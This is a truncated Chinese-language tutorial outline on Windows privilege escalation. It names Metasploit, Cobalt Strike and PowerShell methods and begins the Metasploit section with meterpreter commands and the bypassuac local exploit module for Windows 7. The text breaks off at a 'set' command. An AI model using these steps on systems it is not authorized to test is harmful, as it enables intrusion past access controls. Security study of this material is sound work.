提权一. MSF提权二. 使用Cobalt Strike提权三. Powershell提权
一. MSF提权假设获得一个非管理员权限的会话,序号为1getuid 查看当前权限background 从meterpreter会话中暂时退出(1)bypassuac模块适用系统:Win7 32/64位msf > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set...